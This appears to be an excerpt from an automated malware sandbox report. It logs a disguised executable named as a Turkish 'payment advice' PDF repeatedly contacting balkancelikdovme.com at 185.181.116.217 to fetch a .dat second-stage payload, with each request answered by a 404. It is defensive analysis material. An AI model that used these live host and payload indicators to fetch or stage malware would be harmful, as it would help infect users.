      Dec 16, 2024 14:21:18.117496967 CET44350084185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:18.619059086 CET44350084185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:18.619127035 CET44350084185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:18.619337082 CET50084443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:18.620687962 CET50085443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:18.620690107 CET50084443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:18.620731115 CET44350085185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:18.623260021 CET50085443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:18.624105930 CET50085443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:18.624118090 CET44350085185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:19.994599104 CET44350085185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:19.996642113 CET50085443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:19.996656895 CET44350085185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:20.496680021 CET44350085185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:20.496748924 CET44350085185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:20.496922016 CET50085443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:20.497329950 CET50085443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:20.498404026 CET50086443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:20.498480082 CET44350086185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:20.498671055 CET50086443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:20.500937939 CET50086443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:20.500955105 CET44350086185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:21.849677086 CET44350086185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:21.851535082 CET50086443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:21.851567984 CET44350086185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:22.352113008 CET44350086185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:22.352195024 CET44350086185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:22.352854967 CET50086443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:22.353120089 CET50086443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:22.356950998 CET50087443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:22.356996059 CET44350087185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:22.357376099 CET50087443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:22.357635021 CET50087443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:22.357652903 CET44350087185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:23.705651045 CET44350087185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:23.707992077 CET50087443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:23.708009005 CET44350087185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:24.208962917 CET44350087185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:24.209038973 CET44350087185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:24.209443092 CET50087443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:24.211467028 CET50088443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:24.211519957 CET44350088185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:24.211865902 CET50087443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:24.213243008 CET50088443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:24.216922045 CET50088443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:24.216939926 CET44350088185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:25.570059061 CET44350088185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:25.572716951 CET50088443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:25.572756052 CET44350088185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:26.072943926 CET44350088185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:26.073021889 CET44350088185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:26.073168993 CET50088443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:26.073801994 CET50088443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:26.075067997 CET50089443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:26.075144053 CET44350089185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:26.075236082 CET50089443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:26.075534105 CET50089443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:26.075566053 CET44350089185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:27.619529963 CET44350089185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:27.621582031 CET50089443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:27.621711016 CET44350089185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:28.121912956 CET44350089185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:28.121974945 CET44350089185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:28.125462055 CET50089443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:28.125462055 CET50089443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:28.128937960 CET50090443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:28.128992081 CET44350090185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:28.131689072 CET50090443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:28.131689072 CET50090443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:28.131726027 CET44350090185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:29.480551958 CET44350090185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:29.482609987 CET50090443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:29.482640028 CET44350090185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:29.982573032 CET44350090185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:29.982641935 CET44350090185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:29.982702971 CET50090443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:29.983189106 CET50090443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:29.984282970 CET50091443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:29.984375954 CET44350091185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:29.984458923 CET50091443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:29.984688997 CET50091443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:29.984724045 CET44350091185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:31.339771032 CET44350091185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:31.342838049 CET50091443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:31.342907906 CET44350091185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:31.842431068 CET44350091185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:31.842514038 CET44350091185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:31.842585087 CET50091443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:31.843615055 CET50091443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:31.845948935 CET50092443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:31.845998049 CET44350092185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:31.846075058 CET50092443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:31.846626043 CET50092443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:31.846637964 CET44350092185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:33.196552038 CET44350092185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:33.199002981 CET50092443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:33.199043989 CET44350092185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:33.699161053 CET44350092185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:33.699245930 CET44350092185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:33.699291945 CET50092443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:33.700079918 CET50092443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:33.701680899 CET50093443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:33.701716900 CET44350093185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:33.701790094 CET50093443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:33.702188015 CET50093443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:33.702198982 CET44350093185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:35.087126970 CET44350093185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:35.090718985 CET50093443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:35.090734959 CET44350093185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:35.625945091 CET44350093185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:35.626018047 CET44350093185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:35.626085997 CET50093443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:35.638539076 CET50093443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:35.640791893 CET50094443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:35.640871048 CET44350094185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:35.640958071 CET50094443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:35.647948980 CET50094443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:35.647972107 CET44350094185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:36.996243954 CET44350094185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:37.001528978 CET50094443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:37.001568079 CET44350094185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:37.499423981 CET44350094185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:37.499511003 CET44350094185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:37.499561071 CET50094443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:37.500091076 CET50094443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:37.501868010 CET50095443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:37.501903057 CET44350095185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:37.501993895 CET50095443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:37.502379894 CET50095443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:37.502389908 CET44350095185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:38.967642069 CET44350095185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:38.969558001 CET50095443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:38.969575882 CET44350095185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:39.471945047 CET44350095185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:39.472016096 CET44350095185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:39.472105026 CET50095443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:39.472888947 CET50095443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:39.474442959 CET50096443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:39.474520922 CET44350096185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:39.474606037 CET50096443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:39.474955082 CET50096443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:39.474983931 CET44350096185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:40.823436975 CET44350096185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:40.826767921 CET50096443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:40.826806068 CET44350096185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:41.325655937 CET44350096185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:41.325819016 CET44350096185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:41.325921059 CET50096443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:41.326911926 CET50096443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:41.329489946 CET50097443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:41.329535961 CET44350097185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:41.329617023 CET50097443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:41.330033064 CET50097443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:41.330046892 CET44350097185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:42.733143091 CET44350097185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:42.735224009 CET50097443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:42.735265970 CET44350097185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:43.310226917 CET44350097185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:43.310301065 CET44350097185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:43.310348988 CET50097443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:43.310982943 CET50097443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:43.312306881 CET50098443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:43.312391043 CET44350098185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:43.312474012 CET50098443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:43.312772989 CET50098443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:43.312807083 CET44350098185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:44.729378939 CET44350098185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:44.731669903 CET50098443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:44.731682062 CET44350098185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:45.234550953 CET44350098185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:45.234625101 CET44350098185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:45.234700918 CET50098443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:45.235361099 CET50098443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:45.237371922 CET50099443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:45.237431049 CET44350099185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:45.237497091 CET50099443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:45.238116026 CET50099443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:45.238137960 CET44350099185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:46.628597021 CET44350099185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:46.631063938 CET50099443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:46.631098032 CET44350099185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:47.133395910 CET44350099185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:47.133476019 CET44350099185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:47.133532047 CET50099443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:47.134273052 CET50099443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:47.135638952 CET50100443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:47.135683060 CET44350100185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:47.135752916 CET50100443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:47.136056900 CET50100443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:47.136066914 CET44350100185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:48.517740965 CET44350100185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:48.519737005 CET50100443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:48.519756079 CET44350100185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:49.020689011 CET44350100185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:49.020766020 CET44350100185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:49.020963907 CET50100443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:49.021720886 CET50100443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:49.022394896 CET50101443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:49.022454023 CET44350101185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:49.022557020 CET50101443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:49.022958994 CET50101443192.168.2.7185.181.116.217
      Dec 16, 2024 14:21:49.022975922 CET44350101185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:50.605170012 CET44350101185.181.116.217192.168.2.7
      Dec 16, 2024 14:21:50.656946898 CET50101443192.168.2.7185.181.116.217
      TimestampSource PortDest PortSource IPDest IP
      Dec 16, 2024 14:17:41.829402924 CET6088753192.168.2.71.1.1.1
      Dec 16, 2024 14:17:42.228948116 CET53608871.1.1.1192.168.2.7
      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
      Dec 16, 2024 14:17:41.829402924 CET192.168.2.71.1.1.10xbe57Standard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
      Dec 16, 2024 14:17:42.228948116 CET1.1.1.1192.168.2.70xbe57No error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
      • balkancelikdovme.com
      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      0192.168.2.749700185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:17:43 UTC88OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      Connection: Keep-Alive
      2024-12-16 13:17:44 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:17:44 GMT
      vary: User-Agent
      2024-12-16 13:17:44 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      1192.168.2.749701185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:17:45 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:17:46 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:17:45 GMT
      vary: User-Agent
      2024-12-16 13:17:46 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      2192.168.2.749702185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:17:47 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:17:47 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:17:47 GMT
      vary: User-Agent
      2024-12-16 13:17:47 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      3192.168.2.749703185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:17:49 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:17:49 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:17:49 GMT
      vary: User-Agent
      2024-12-16 13:17:49 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      4192.168.2.749704185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:17:51 UTC88OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      Connection: Keep-Alive
      2024-12-16 13:17:51 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:17:51 GMT
      vary: User-Agent
      2024-12-16 13:17:51 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      5192.168.2.749706185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:17:53 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:17:53 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:17:53 GMT
      vary: User-Agent
      2024-12-16 13:17:53 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
